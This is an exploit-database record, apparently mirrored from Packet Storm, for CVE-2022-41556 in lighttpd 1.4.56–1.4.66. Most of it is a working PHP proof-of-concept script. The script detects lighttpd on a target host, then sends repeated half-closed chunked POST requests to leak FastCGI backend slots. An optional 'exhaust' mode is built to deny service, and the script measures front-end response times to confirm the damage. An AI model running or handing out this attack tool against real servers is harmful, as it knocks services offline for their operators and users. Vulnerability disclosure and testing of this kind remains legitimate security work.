{“lastseen”:”2026-01-27T17:14:09″,”description”:”Proof of concept exploit for a resource exhaustion vulnerability that exists in lighttpd versions 1.4.56 through 1.4.66 affecting FastCGI and other gateway backends. When processing HTTP\/1.1 requests using chunked transfer encoding with request-body…”,”published”:”2026-01-27T00:00:00″,”modified”:”2026-01-27T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Lighttpd 1.4.66 FastCGI Resource Exhaustion”,”source”:””,”references”:””,”id”:”PACKETSTORM:214430″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2022-41556″],”sourceData”:”=============================================================================================================================================\\n | # Title : Lighttpd 1.4.66 FastCGI Backend Resource Leak via Chunked Request Handling |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.lighttpd.net\/ |\\n =============================================================================================================================================\\n \\n [+] References: https:\/\/packetstorm.news\/files\/id\/214292\/ \\u0026 CVE-2022-41556\\n \\n [+] Summary: A resource exhaustion vulnerability exists in lighttpd versions 1.4.56 through 1.4.66 affecting FastCGI and other gateway backends. \\n When processing HTTP\/1.1 requests using chunked transfer encoding with request-body streaming enabled, \\n \\t\\t\\t an anomalous client disconnect (half\u2011closed TCP connection) before the terminating chunk can cause backend slots to be leaked. \\n Repeated occurrences may exhaust available backend resources, leading to service degradation or denial of service. The issue is resolved in lighttpd 1.4.67 and later.\\n \\n [+] POC : php poc.php \\n \\n \\u003c?php\\n \\n class FastCGILeakTester {\\n private $host;\\n private $port;\\n private $fcgiPath;\\n private $connections;\\n private $delay;\\n private $detectOnly;\\n private $running = true;\\n private $sockets = [];\\n \\n public function __construct($host, $port, $fcgiPath, $connections, $delay, $detectOnly) {\\n $this-\\u003ehost = $host;\\n $this-\\u003eport = $port;\\n $this-\\u003efcgiPath = $fcgiPath;\\n $this-\\u003econnections = $connections;\\n $this-\\u003edelay = $delay;\\n $this-\\u003edetectOnly = $detectOnly;\\n }\\n \\n private function makeSocket() {\\n $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);\\n if ($socket === false) {\\n throw new Exception(\\”Cannot create socket: \\” . socket_strerror(socket_last_error()));\\n }\\n \\n socket_set_option($socket, SOL_SOCKET, SO_RCVTIMEO, array(‘sec’ =\\u003e 5, ‘usec’ =\\u003e 0));\\n socket_set_option($socket, SOL_SOCKET, SO_SNDTIMEO, array(‘sec’ =\\u003e 5, ‘usec’ =\\u003e 0));\\n \\n if (!socket_connect($socket, $this-\\u003ehost, $this-\\u003eport)) {\\n throw new Exception(\\”Cannot connect to {$this-\\u003ehost}:{$this-\\u003eport}: \\” . socket_strerror(socket_last_error($socket)));\\n }\\n \\n return $socket;\\n }\\n \\n private function chunkyFunk($connectionId) {\\n try {\\n $socket = $this-\\u003emakeSocket();\\n \\n $request = \\”POST {$this-\\u003efcgiPath} HTTP\/1.1\\\\r\\\\n\\” .\\n \\”Host: {$this-\\u003ehost}\\\\r\\\\n\\” .\\n \\”Transfer-Encoding: chunked\\\\r\\\\n\\” .\\n \\”Connection: keep-alive\\\\r\\\\n\\” .\\n \\”\\\\r\\\\n\\”;\\n \\n socket_write($socket, $request);\\n socket_write($socket, \\”4\\\\r\\\\ntest\\\\r\\\\n\\”);\\n \\n socket_shutdown($socket, 1); \/\/ 1 = shutdown write\\n \\n $this-\\u003esockets[] = $socket;\\n echo \\”[+] [{$connectionId}] anomalous FastCGI request sent\\\\n\\”;\\n } catch (Exception $e) {\\n echo \\”[-] [{$connectionId}] failed: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n }\\n }\\n \\n public function run() {\\n echo \\”[*] Target: http:\/\/{$this-\\u003ehost}:{$this-\\u003eport}{$this-\\u003efcgiPath}\\\\n\\”;\\n echo \\”[*] Mode: \\” . ($this-\\u003edetectOnly ? ‘DETECT’ : ‘EXHAUST’) . \\”\\\\n\\”;\\n \\n for ($i = 0; $i \\u003c $this-\\u003econnections; $i++) {\\n if (!$this-\\u003erunning) {\\n break;\\n }\\n \\n $this-\\u003echunkyFunk($i);\\n \\n if ($this-\\u003edelay \\u003e 0) {\\n usleep($this-\\u003edelay * 1000000);\\n }\\n }\\n \\n echo \\”[*] Injection phase complete\\\\n\\”;\\n }\\n \\n public function frontendProbe() {\\n echo \\”[*] Starting frontend probe\\\\n\\”;\\n \\n while ($this-\\u003erunning) {\\n try {\\n $start = microtime(true);\\n \\n $socket = $this-\\u003emakeSocket();\\n socket_write($socket, \\”GET \/ HTTP\/1.0\\\\r\\\\n\\\\r\\\\n\\”);\\n \\n $response = ”;\\n socket_recv($socket, $response, 64, 0);\\n \\n $elapsed = microtime(true) – $start;\\n socket_close($socket);\\n \\n echo \\”[PROBE] frontend response time: \\” . number_format($elapsed, 3) . \\”s\\\\n\\”;\\n } catch (Exception $e) {\\n echo \\”[PROBE] frontend failure: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n }\\n \\n sleep(3);\\n }\\n }\\n \\n public function cleanup() {\\n $this-\\u003erunning = false;\\n foreach ($this-\\u003esockets as $socket) {\\n try {\\n socket_close($socket);\\n } catch (Exception $e) {\\n \\n }\\n }\\n echo \\”[*] Cleanup complete\\\\n\\”;\\n }\\n }\\n \\n function checkLighty($host, $port) {\\n try {\\n $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);\\n if ($socket === false) {\\n throw new Exception(\\”Socket creation failed\\”);\\n }\\n \\n socket_set_option($socket, SOL_SOCKET, SO_RCVTIMEO, array(‘sec’ =\\u003e 3, ‘usec’ =\\u003e 0));\\n \\n if (!socket_connect($socket, $host, $port)) {\\n throw new Exception(\\”Connection failed\\”);\\n }\\n \\n socket_write($socket, \\”HEAD \/ HTTP\/1.0\\\\r\\\\n\\\\r\\\\n\\”);\\n \\n $response = ”;\\n while ($chunk = socket_read($socket, 512)) {\\n $response .= $chunk;\\n }\\n \\n socket_close($socket);\\n \\n $lines = explode(\\”\\\\n\\”, $response);\\n foreach ($lines as $line) {\\n if (stripos($line, ‘Server:’) !== false \\u0026\\u0026 stripos($line, ‘lighttpd’) !== false) {\\n echo \\”[+] Detected \\” . trim($line) . \\”\\\\n\\”;\\n return true;\\n }\\n }\\n \\n echo \\”[-] lighttpd not detected\\\\n\\”;\\n return false;\\n } catch (Exception $e) {\\n echo \\”[-] connection failed: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n return false;\\n }\\n }\\n \\n function main() {\\n global $banner;\\n \\n $options = getopt(\\”\\”, [\\n \\”host:\\”,\\n \\”port:\\”,\\n \\”fcgi-path:\\”,\\n \\”n:\\”,\\n \\”conns:\\”,\\n \\”delay:\\”,\\n \\”exhaust\\”\\n ]);\\n \\n $host = isset($options[‘host’]) ? $options[‘host’] : null;\\n if (!$host \\u0026\\u0026 isset($argv[1]) \\u0026\\u0026 !strpos($argv[1], ‘–‘)) {\\n $host = $argv[1];\\n }\\n \\n if (!$host) {\\n echo \\”Usage: php \\” . basename(__FILE__) . \\” [options] \\u003chost\\u003e\\\\n\\”;\\n echo \\”Options:\\\\n\\”;\\n echo \\” –host \\u003chost\\u003e Target host\\\\n\\”;\\n echo \\” –port \\u003cport\\u003e Target port (default: 80)\\\\n\\”;\\n echo \\” –fcgi-path \\u003cpath\\u003e FastCGI-backed path (default: \/index.php)\\\\n\\”;\\n echo \\” -n, –conns \\u003cnum\\u003e Number of connections (default: 5)\\\\n\\”;\\n echo \\” –delay \\u003cseconds\\u003e Delay between connections (default: 0.2)\\\\n\\”;\\n echo \\” –exhaust Exhaust backend slots (DESTRUCTIVE)\\\\n\\”;\\n exit(1);\\n }\\n \\n $port = isset($options[‘port’]) ? (int)$options[‘port’] : 80;\\n $fcgiPath = isset($options[‘fcgi-path’]) ? $options[‘fcgi-path’] : ‘\/index.php’;\\n $connections = isset($options[‘n’]) ? (int)$options[‘n’] : \\n (isset($options[‘conns’]) ? (int)$options[‘conns’] : 5);\\n $delay = isset($options[‘delay’]) ? (float)$options[‘delay’] : 0.2;\\n $exhaust = isset($options[‘exhaust’]);\\n \\n echo $banner . \\”\\\\n\\”;\\n \\n if (!checkLighty($host, $port)) {\\n exit(1);\\n }\\n \\n $tester = new FastCGILeakTester(\\n $host,\\n $port,\\n $fcgiPath,\\n $connections,\\n $delay,\\n !$exhaust\\n );\\n \\n declare(ticks = 1);\\n pcntl_signal(SIGINT, function() use (\\u0026$tester) {\\n echo \\”\\\\n[*] Interrupted by user\\\\n\\”;\\n $tester-\\u003ecleanup();\\n exit(0);\\n });\\n \\n try {\\n $tester-\\u003erun();\\n \\n echo \\”[*] Starting frontend probe\\\\n\\”;\\n \\n $probeCount = 0;\\n while ($probeCount \\u003c 10) { \\n try {\\n $start = microtime(true);\\n \\n $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);\\n socket_set_option($socket, SOL_SOCKET, SO_RCVTIMEO, array(‘sec’ =\\u003e 5, ‘usec’ =\\u003e 0));\\n \\n if (socket_connect($socket, $host, $port)) {\\n socket_write($socket, \\”GET \/ HTTP\/1.0\\\\r\\\\n\\\\r\\\\n\\”);\\n \\n $response = ”;\\n socket_recv($socket, $response, 64, 0);\\n \\n $elapsed = microtime(true) – $start;\\n echo \\”[PROBE] frontend response time: \\” . number_format($elapsed, 3) . \\”s\\\\n\\”;\\n socket_close($socket);\\n }\\n } catch (Exception $e) {\\n echo \\”[PROBE] frontend failure: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n }\\n \\n sleep(3);\\n $probeCount++;\\n }\\n \\n } catch (Exception $e) {\\n echo \\”[-] Error during test: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n } finally {\\n $tester-\\u003ecleanup();\\n }\\n \\n echo \\”[*] Test complete\\\\n\\”;\\n }\\n \\n if (php_sapi_name() === ‘cli’) {\\n main();\\n } else {\\n echo \\”This script must be run from the command line.\\\\n\\”;\\n exit(1);\\n }\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/214430″,”cvss”:{“score”:7.5,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:N\/I:N\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/214430\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-27T17:14:09″,”description”:”Proof of concept exploit for a resource exhaustion vulnerability that exists in lighttpd versions 1.4.56 through 1.4.66 affecting FastCGI and other gateway backends. When processing…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,16,12,15,13,53,7,11,5],"class_list":["post-37578","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-75","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n